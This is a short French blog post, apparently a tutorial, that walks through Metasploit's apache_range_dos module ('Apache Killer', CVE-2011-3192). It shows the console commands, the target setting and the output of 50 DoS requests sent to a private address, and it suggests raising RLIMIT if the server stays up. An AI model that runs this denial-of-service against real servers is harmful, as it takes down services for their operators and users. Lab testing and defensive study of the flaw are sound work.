Metasploit - Intégration de Kill Apache

Il y a quelques semaines, un script en Perl fut son apparition sur le Web. Celui-ci permet de lancer un DoS sur les serveurs fonctionnant sur Apache. Le fameux Kill Apache a été intégré dans Metasploit dans la révision 13781.




Pour les détails sur cette faille, j'en ai parlé dans cet article.



Passons à la pratique :)

Premièrement, mettons à jour Metasploit pour avoir le module :
root@localhost ~ $ sudo msfupdate


root@localhost ~ $ sudo msfconsole
msf > use auxiliary/dos/http/apache_range_dos
msf  auxiliary(apache_range_dos) > info
Name: Apache Range header DoS(Apache Killer)
Module: auxiliary/dos/http/apache_range_dos 
Version: 13781
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
  Kingcope
  Masashi Fujiwara

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOST                    yes       The target address
  RLIMIT  50               yes       Number of requests to send
  RPORT   80               yes       The target port
  URI     /                yes       The request URI

Description:
The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, exploit called "Apache Killer"

References:
  http://www.securityfocus.com/bid/49303
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2011-3192
  http://www.exploit-db.com/exploits/17696/
  http://www.osvdb.org/74721
 
msf  auxiliary(apache_range_dos) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf  auxiliary(apache_range_dos) > run

[*] Sending DoS packet 1 to 192.168.0.7:80
[*] Sending DoS packet 2 to 192.168.0.7:80
[*] Sending DoS packet 3 to 192.168.0.7:80
[*] Sending DoS packet 4 to 192.168.0.7:80
[*] Sending DoS packet 5 to 192.168.0.7:80
[...]
[*] Sending DoS packet 46 to 192.168.0.7:80
[*] Sending DoS packet 47 to 192.168.0.7:80
[*] Sending DoS packet 48 to 192.168.0.7:80
[*] Sending DoS packet 49 to 192.168.0.7:80
[*] Sending DoS packet 50 to 192.168.0.7:80
[*] Auxiliary module execution completed

msf  auxiliary(apache_range_dos) >


Par défaut, on envoi 50 requêtes, si cela ne suffit pas pour écrouler le serveur, il est possible d'augmenter ce paramètre en modifiant RLIMIT.


À tester uniquement sur votre propre serveur, bien sûr.

Aucun commentaire:

Enregistrer un commentaire

Inscription à : Publier les commentaires (Atom)